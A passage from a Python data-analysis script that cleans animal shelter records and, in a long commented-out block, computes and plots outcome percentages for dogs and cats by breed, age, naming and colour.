#field is mapped to 'Unknown'
idx_sex_0 = data['SexuponOutcome'] == ''
idx_sex_1 = data['SexuponOutcome'] == 'Intact Male'
idx_sex_2 = data['SexuponOutcome'] == 'Intact Female'
idx_sex_3 = data['SexuponOutcome'] == 'Spayed Female'
idx_sex_4 = data['SexuponOutcome'] == 'Neutered Male'
data['SexuponOutcome'][idx_sex_1] = "IntactMale"
data['SexuponOutcome'][idx_sex_2] = "IntactFemale"
data['SexuponOutcome'][idx_sex_3] = "SpayedFemale"
data['SexuponOutcome'][idx_sex_4] = "NeuteredMale"
data['SexuponOutcome'][idx_sex_0] = "Unknown"
#persist the fully cleaned data set for the next stage
np.savetxt('filterPass4.txt',data,fmt="%s",delimiter=',')
#dataVectors = []
#file = open('filterPass5.txt','r')
#for line in file:
# dataVectors.append(line.strip().split(','))
#file.close()
#newData = np.array(dataVectors)
#np.savetxt('filterPass6.txt',newData,fmt="%s",delimiter=',')
#listOfUniqueElements = [[] for i in range(10)]
#for i in range(len(dataVectors)):
# for k in range(len(dataVectors[i])):
# if dataVectors[i][k] not in listOfUniqueElements[k]:
# listOfUniqueElements[k].append(dataVectors[i][k])
#listOfNumericalElements = [[] for i in range(10)]
#for i in range(len(dataVectors)):
# for k in range(len(dataVectors[i])):
# listOfNumericalElements[k].append(listOfUniqueElements[k].index(dataVectors[i][k]))
#dataVectorsTest = []
#file = open('filterPass6.txt','r')
#for line in file:
# dataVectorsTest.append(line.strip().split(','))
#file.close()
#listOfNumericalElementsTest = [[] for i in range(10)]
#for i in range(len(dataVectorsTest)):
# for k in range(len(dataVectorsTest[i])):
# listOfNumericalElementsTest[k].append(listOfUniqueElements[k].index(dataVectorsTest[i][k]))
#f = open('numericalDataTrain.txt', 'w')
#for i in range(len(listOfNumericalElements[0])):
# for k in range(len(listOfNumericalElements)):
# f.write(str(listOfNumericalElements[k][i]))
# if k != len(listOfNumericalElements) - 1:
# f.write(',')
# f.write('\n')
#f.close()
#f = open('numericalDataTest.txt', 'w')
#for i in range(len(listOfNumericalElementsTest[0])):
# for k in range(len(listOfNumericalElementsTest)):
# f.write(str(listOfNumericalElementsTest[k][i]))
# if k != len(listOfNumericalElementsTest) - 1:
# f.write(',')
# f.write('\n')
#f.close()
#everything below this point was the code to produce those bar graphs that were in the presentation
#there was a lot of tedious and copy pasted probability calculation in it
#however all the code is down there so you can see, just uncomment if you wish to run yourself
#mixDogsAdopted = 0
#mixDogsDied = 0
#mixDogsTransfered = 0
#mixDogsReturnedToOwners = 0
#mixDogsEuthanized = 0
#purebredDogsAdopted = 0
#purebredDogsDied = 0
#purebredDogsTransfered = 0
#purebredDogsReturnedToOwners = 0
#purebredDogsEuthanized = 0
#mixCatsAdopted = 0
#mixCatsDied = 0
#mixCatsTransfered = 0
#mixCatsReturnedToOwners = 0
#mixCatsEuthanized = 0
#purebredCatsAdopted = 0
#purebredCatsDied = 0
#purebredCatsTransfered = 0
#purebredCatsReturnedToOwners = 0
#purebredCatsEuthanized = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][8] == 'Mix':
# mixDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][8] == 'Mix':
# mixDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][8] == 'Mix':
# mixDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][8] == 'Mix':
# mixDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][8] == 'Mix':
# mixDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][8] == 'Purebred':
# purebredDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][8] == 'Purebred':
# purebredDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][8] == 'Purebred':
# purebredDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][8] == 'Purebred':
# purebredDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][8] == 'Purebred':
# purebredDogsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][8] == 'Mix':
# mixCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][8] == 'Mix':
# mixCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][8] == 'Mix':
# mixCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][8] == 'Mix':
# mixCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][8] == 'Mix':
# mixCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][8] == 'Purebred':
# purebredCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][8] == 'Purebred':
# purebredCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][8] == 'Purebred':
# purebredCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][8] == 'Purebred':
# purebredCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][8] == 'Purebred':
# purebredCatsEuthanized += 1
#nummixDogs = 0
#numpurebredDogs = 0
#nummixCats = 0
#numpurebredCats = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][8] == 'Mix':
# nummixDogs += 1
# if data[i][5] == 'Dog' and data[i][8] == 'Purebred':
# numpurebredDogs += 1
# if data[i][5] == 'Cat' and data[i][8] == 'Mix':
# nummixCats += 1
# if data[i][5] == 'Cat' and data[i][8] == 'Purebred':
# numpurebredCats += 1
#percentagemixDogsAdopted = mixDogsAdopted/nummixDogs*100
#percentagemixDogsDied = mixDogsDied/nummixDogs*100
#percentagemixDogsTransfered = mixDogsTransfered/nummixDogs*100
#percentagemixDogsReturnToOwners = mixDogsReturnedToOwners/nummixDogs*100
#percentagemixDogsEuthanized = mixDogsEuthanized/nummixDogs*100
#percentagemixDogsOutcomes = [percentagemixDogsAdopted, percentagemixDogsDied, percentagemixDogsTransfered, percentagemixDogsReturnToOwners, percentagemixDogsEuthanized]
#percentagepurebredDogsAdopted = purebredDogsAdopted/numpurebredDogs*100
#percentagepurebredDogsDied = purebredDogsDied/numpurebredDogs*100
#percentagepurebredDogsTransfered = purebredDogsTransfered/numpurebredDogs*100
#percentagepurebredDogsReturnToOwners = purebredDogsReturnedToOwners/numpurebredDogs*100
#percentagepurebredDogsEuthanized = purebredDogsEuthanized/numpurebredDogs*100
#percentagepurebredDogsOutcomes = [percentagepurebredDogsAdopted, percentagepurebredDogsDied, percentagepurebredDogsTransfered, percentagepurebredDogsReturnToOwners, percentagepurebredDogsEuthanized]
#percentagemixCatsAdopted = mixCatsAdopted/nummixCats*100
#percentagemixCatsDied = mixCatsDied/nummixCats*100
#percentagemixCatsTransfered = mixCatsTransfered/nummixCats*100
#percentagemixCatsReturnToOwners = mixCatsReturnedToOwners/nummixCats*100
#percentagemixCatsEuthanized = mixCatsEuthanized/nummixCats*100
#percentagemixCatsOutcomes = [percentagemixCatsAdopted, percentagemixCatsDied, percentagemixCatsTransfered, percentagemixCatsReturnToOwners, percentagemixCatsEuthanized]
#percentagepurebredCatsAdopted = purebredCatsAdopted/numpurebredCats*100
#percentagepurebredCatsDied = purebredCatsDied/numpurebredCats*100
#percentagepurebredCatsTransfered = purebredCatsTransfered/numpurebredCats*100
#percentagepurebredCatsReturnToOwners = purebredCatsReturnedToOwners/numpurebredCats*100
#percentagepurebredCatsEuthanized = purebredCatsEuthanized/numpurebredCats*100
#percentagepurebredCatsOutcomes = [percentagepurebredCatsAdopted, percentagepurebredCatsDied, percentagepurebredCatsTransfered, percentagepurebredCatsReturnToOwners, percentagepurebredCatsEuthanized]
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentagemixDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Mixed Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentagepurebredDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Purebred Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentagemixCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Mixed Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentagepurebredCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Purebred Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#youngDogsAdopted = 0
#youngDogsDied = 0
#youngDogsTransfered = 0
#youngDogsReturnedToOwners = 0
#youngDogsEuthanized = 0
#middleAgedDogsAdopted = 0
#middleAgedDogsDied = 0
#middleAgedDogsTransfered = 0
#middleAgedDogsReturnedToOwners = 0
#middleAgedDogsEuthanized = 0
#oldDogsAdopted = 0
#oldDogsDied = 0
#oldDogsTransfered = 0
#oldDogsReturnedToOwners = 0
#oldDogsEuthanized = 0
#######################################
#youngCatsAdopted = 0
#youngCatsDied = 0
#youngCatsTransfered = 0
#youngCatsReturnedToOwners = 0
#youngCatsEuthanized = 0
#middleAgedCatsAdopted = 0
#middleAgedCatsDied = 0
#middleAgedCatsTransfered = 0
#middleAgedCatsReturnedToOwners = 0
#middleAgedCatsEuthanized = 0
#oldCatsAdopted = 0
#oldCatsDied = 0
#oldCatsTransfered = 0
#oldCatsReturnedToOwners = 0
#oldCatsEuthanized = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][7] == '<5years':
# youngDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][7] == '<5years':
# youngDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][7] == '<5years':
# youngDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][7] == '<5years':
# youngDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][7] == '<5years':
# youngDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][7] == '>=5and<10years':
# middleAgedDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][7] == '>=5and<10years':
# middleAgedDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][7] == '>=5and<10years':
# middleAgedDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][7] == '>=5and<10years':
# middleAgedDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][7] == '>=5and<10years':
# middleAgedDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][7] == '>=10years':
# oldDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][7] == '>=10years':
# oldDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][7] == '>=10years':
# oldDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][7] == '>=10years':
# oldDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][7] == '>=10years':
# oldDogsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][7] == '<5years':
# youngCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][7] == '<5years':
# youngCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][7] == '<5years':
# youngCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][7] == '<5years':
# youngCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][7] == '<5years':
# youngCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][7] == '>=5and<10years':
# middleAgedCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][7] == '>=5and<10years':
# middleAgedCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][7] == '>=5and<10years':
# middleAgedCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][7] == '>=5and<10years':
# middleAgedCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][7] == '>=5and<10years':
# middleAgedCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][7] == '>=10years':
# oldCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][7] == '>=10years':
# oldCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][7] == '>=10years':
# oldCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][7] == '>=10years':
# oldCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][7] == '>=10years':
# oldCatsEuthanized += 1
#numOfDogs = np.sum(data['AnimalType'] == 'Dog')
#numOfCats = np.sum(data['AnimalType'] == 'Cat')
#numAdopted = np.sum(data['OutcomeType'] == 'Adoption')
#numDied = np.sum(data['OutcomeType'] == 'Died')
#numEuthanized = np.sum(data['OutcomeType'] == 'Euthanasia')
#numTransfered = np.sum(data['OutcomeType'] == 'Transfer')
#numReturned = np.sum(data['OutcomeType'] == 'Return_to_owner')
#numYoungDogs = 0
#numMiddleDogs = 0
#numOldDogs = 0
#numYoungCats = 0
#numMiddleCats = 0
#numOldCats = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][7] == '<5years':
# numYoungDogs += 1
# if data[i][5] == 'Dog' and data[i][7] == '>=5and<10years':
# numMiddleDogs += 1
# if data[i][5] == 'Dog' and data[i][7] == '>=10years':
# numOldDogs += 1
# if data[i][5] == 'Cat' and data[i][7] == '<5years':
# numYoungCats += 1
# if data[i][5] == 'Cat' and data[i][7] == '>=5and<10years':
# numMiddleCats += 1
# if data[i][5] == 'Cat' and data[i][7] == '>=10years':
# numOldCats += 1
#percentageYoungDogsAdopted = youngDogsAdopted/numYoungDogs*100
#percentageYoungDogsDied = youngDogsDied/numYoungDogs*100
#percentageYoungDogsTransfered = youngDogsTransfered/numYoungDogs*100
#percentageYoungDogsReturnToOwners = youngDogsReturnedToOwners/numYoungDogs*100
#percentageYoungDogsEuthanized = youngDogsEuthanized/numYoungDogs*100
#percentageYoungDogsOutcomes = [percentageYoungDogsAdopted, percentageYoungDogsDied, percentageYoungDogsTransfered, percentageYoungDogsReturnToOwners, percentageYoungDogsEuthanized]
#percentageMiddleDogsAdopted = middleAgedDogsAdopted/numMiddleDogs*100
#percentageMiddleDogsDied = middleAgedDogsDied/numMiddleDogs*100
#percentageMiddleDogsTransfered = middleAgedDogsTransfered/numMiddleDogs*100
#percentageMiddleDogsReturnToOwners = middleAgedDogsReturnedToOwners/numMiddleDogs*100
#percentageMiddleDogsEuthanized = middleAgedDogsEuthanized/numMiddleDogs*100
#percentageMiddleDogsOutcomes = [percentageMiddleDogsAdopted, percentageMiddleDogsDied, percentageMiddleDogsTransfered, percentageMiddleDogsReturnToOwners, percentageMiddleDogsEuthanized]
#percentageOldDogsAdopted = oldDogsAdopted/numOldDogs*100
#percentageOldDogsDied = oldDogsDied/numOldDogs*100
#percentageOldDogsTransfered = oldDogsTransfered/numOldDogs*100
#percentageOldDogsReturnToOwners = oldDogsReturnedToOwners/numOldDogs*100
#percentageOldDogsEuthanized = oldDogsEuthanized/numOldDogs*100
#percentageOldDogsOutcomes = [percentageOldDogsAdopted, percentageOldDogsDied, percentageOldDogsTransfered, percentageOldDogsReturnToOwners, percentageOldDogsEuthanized]
#percentageYoungCatsAdopted = youngCatsAdopted/numYoungCats*100
#percentageYoungCatsDied = youngCatsDied/numYoungCats*100
#percentageYoungCatsTransfered = youngCatsTransfered/numYoungCats*100
#percentageYoungCatsReturnToOwners = youngCatsReturnedToOwners/numYoungCats*100
#percentageYoungCatsEuthanized = youngCatsEuthanized/numYoungCats*100
#percentageYoungCatsOutcomes = [percentageYoungCatsAdopted, percentageYoungCatsDied, percentageYoungCatsTransfered, percentageYoungCatsReturnToOwners, percentageYoungCatsEuthanized]
#percentageMiddleCatsAdopted = middleAgedCatsAdopted/numMiddleCats*100
#percentageMiddleCatsDied = middleAgedCatsDied/numMiddleCats*100
#percentageMiddleCatsTransfered = middleAgedCatsTransfered/numMiddleCats*100
#percentageMiddleCatsReturnToOwners = middleAgedCatsReturnedToOwners/numMiddleCats*100
#percentageMiddleCatsEuthanized = middleAgedCatsEuthanized/numMiddleCats*100
#percentageMiddleCatsOutcomes = [percentageMiddleCatsAdopted, percentageMiddleCatsDied, percentageMiddleCatsTransfered, percentageMiddleCatsReturnToOwners, percentageMiddleCatsEuthanized]
#percentageOldCatsAdopted = oldCatsAdopted/numOldCats*100
#percentageOldCatsDied = oldCatsDied/numOldCats*100
#percentageOldCatsTransfered = oldCatsTransfered/numOldCats*100
#percentageOldCatsReturnToOwners = oldCatsReturnedToOwners/numOldCats*100
#percentageOldCatsEuthanized = oldCatsEuthanized/numOldCats*100
#percentageOldCatsOutcomes = [percentageOldCatsAdopted, percentageOldCatsDied, percentageOldCatsTransfered, percentageOldCatsReturnToOwners, percentageOldCatsEuthanized]
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageYoungDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Young Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageMiddleDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Middle Aged Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageOldDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Old Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageYoungCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Young Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageMiddleCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Middle Aged Cats Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageOldCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Old Cats Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#namedDogsAdopted = 0
#namedDogsDied = 0
#namedDogsTransfered = 0
#namedDogsReturnedToOwners = 0
#namedDogsEuthanized = 0
#unNamedDogsAdopted = 0
#unNamedDogsDied = 0
#unNamedDogsTransfered = 0
#unNamedDogsReturnedToOwners = 0
#unNamedDogsEuthanized = 0
#namedCatsAdopted = 0
#namedCatsDied = 0
#namedCatsTransfered = 0
#namedCatsReturnedToOwners = 0
#namedCatsEuthanized = 0
#unNamedCatsAdopted = 0
#unNamedCatsDied = 0
#unNamedCatsTransfered = 0
#unNamedCatsReturnedToOwners = 0
#unNamedCatsEuthanized = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][0] == 'Named':
# namedDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][0] == 'Named':
# namedDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][0] == 'Named':
# namedDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][0] == 'Named':
# namedDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][0] == 'Named':
# namedDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][0] == 'NoName':
# unNamedDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][0] == 'NoName':
# unNamedDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][0] == 'NoName':
# unNamedDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][0] == 'NoName':
# unNamedDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][0] == 'NoName':
# unNamedDogsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][0] == 'Named':
# namedCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][0] == 'Named':
# namedCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][0] == 'Named':
# namedCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][0] == 'Named':
# namedCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][0] == 'Named':
# namedCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][0] == 'NoName':
# unNamedCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][0] == 'NoName':
# unNamedCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][0] == 'NoName':
# unNamedCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][0] == 'NoName':
# unNamedCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][0] == 'NoName':
# unNamedCatsEuthanized += 1
#numNamedDogs = 0
#numUnNamedDogs = 0
#numNamedCats = 0
#numUnNamedCats = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][0] == 'Named':
# numNamedDogs += 1
# if data[i][5] == 'Dog' and data[i][0] == 'NoName':
# numUnNamedDogs += 1
# if data[i][5] == 'Cat' and data[i][0] == 'Named':
# numNamedCats += 1
# if data[i][5] == 'Cat' and data[i][0] == 'NoName':
# numUnNamedCats += 1
#percentageNamedDogsAdopted = namedDogsAdopted/numNamedDogs*100
#percentageNamedDogsDied = namedDogsDied/numNamedDogs*100
#percentageNamedDogsTransfered = namedDogsTransfered/numNamedDogs*100
#percentageNamedDogsReturnToOwners = namedDogsReturnedToOwners/numNamedDogs*100
#percentageNamedDogsEuthanized = namedDogsEuthanized/numNamedDogs*100
#percentageNamedDogsOutcomes = [percentageNamedDogsAdopted, percentageNamedDogsDied, percentageNamedDogsTransfered, percentageNamedDogsReturnToOwners, percentageNamedDogsEuthanized]
#percentageUnNamedDogsAdopted = unNamedDogsAdopted/numUnNamedDogs*100
#percentageUnNamedDogsDied = unNamedDogsDied/numUnNamedDogs*100
#percentageUnNamedDogsTransfered = unNamedDogsTransfered/numUnNamedDogs*100
#percentageUnNamedDogsReturnToOwners = unNamedDogsReturnedToOwners/numUnNamedDogs*100
#percentageUnNamedDogsEuthanized = unNamedDogsEuthanized/numUnNamedDogs*100
#percentageUnNamedDogsOutcomes = [percentageUnNamedDogsAdopted, percentageUnNamedDogsDied, percentageUnNamedDogsTransfered, percentageUnNamedDogsReturnToOwners, percentageUnNamedDogsEuthanized]
#percentageNamedCatsAdopted = namedCatsAdopted/numNamedCats*100
#percentageNamedCatsDied = namedCatsDied/numNamedCats*100
#percentageNamedCatsTransfered = namedCatsTransfered/numNamedCats*100
#percentageNamedCatsReturnToOwners = namedCatsReturnedToOwners/numNamedCats*100
#percentageNamedCatsEuthanized = namedCatsEuthanized/numNamedCats*100
#percentageNamedCatsOutcomes = [percentageNamedCatsAdopted, percentageNamedCatsDied, percentageNamedCatsTransfered, percentageNamedCatsReturnToOwners, percentageNamedCatsEuthanized]
#percentageUnNamedCatsAdopted = unNamedCatsAdopted/numUnNamedCats*100
#percentageUnNamedCatsDied = unNamedCatsDied/numUnNamedCats*100
#percentageUnNamedCatsTransfered = unNamedCatsTransfered/numUnNamedCats*100
#percentageUnNamedCatsReturnToOwners = unNamedCatsReturnedToOwners/numUnNamedCats*100
#percentageUnNamedCatsEuthanized = unNamedCatsEuthanized/numUnNamedCats*100
#percentageUnNamedCatsOutcomes = [percentageUnNamedCatsAdopted, percentageUnNamedCatsDied, percentageUnNamedCatsTransfered, percentageUnNamedCatsReturnToOwners, percentageUnNamedCatsEuthanized]
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageNamedDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Named Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageUnNamedDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Un-Named Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageNamedCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Named Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageUnNamedCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Un-Named Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#SolidColorDogsAdopted = 0
#SolidColorDogsDied = 0
#SolidColorDogsTransfered = 0
#SolidColorDogsReturnedToOwners = 0
#SolidColorDogsEuthanized = 0
#MixedColorDogsAdopted = 0
#MixedColorDogsDied = 0
#MixedColorDogsTransfered = 0
#MixedColorDogsReturnedToOwners = 0
#MixedColorDogsEuthanized = 0
#SolidColorCatsAdopted = 0
#SolidColorCatsDied = 0
#SolidColorCatsTransfered = 0
#SolidColorCatsReturnedToOwners = 0
#SolidColorCatsEuthanized = 0
#MixedColorCatsAdopted = 0
#MixedColorCatsDied = 0
#MixedColorCatsTransfered = 0
#MixedColorCatsReturnedToOwners = 0
#MixedColorCatsEuthanized = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][9] == 'SolidColor':
# SolidColorDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][9] == 'SolidColor':
# SolidColorDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][9] == 'SolidColor':
# SolidColorDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][9] == 'SolidColor':
# SolidColorDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][9] == 'SolidColor':
# SolidColorDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][9] == 'MixedColor':
# MixedColorDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][9] == 'MixedColor':
# MixedColorDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][9] == 'MixedColor':
# MixedColorDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][9] == 'MixedColor':
# MixedColorDogsReturnedToOwners += 1
